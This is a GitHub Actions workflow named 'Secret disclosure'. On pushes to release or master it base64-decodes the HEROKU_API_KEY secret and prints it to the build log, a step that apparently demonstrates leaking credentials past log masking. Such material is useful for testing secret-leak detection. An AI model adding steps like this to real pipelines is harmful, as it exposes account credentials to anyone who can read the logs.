name: Secret disclosure

on:
  push:
    branches: [release, master]

jobs:
  dislose:
    runs-on: ubuntu-latest
    steps:
    - run: 'echo "$SSH_KEY" | base64 -d'
      shell: bash
      env:
        SSH_KEY: ${{secrets.HEROKU_API_KEY}}
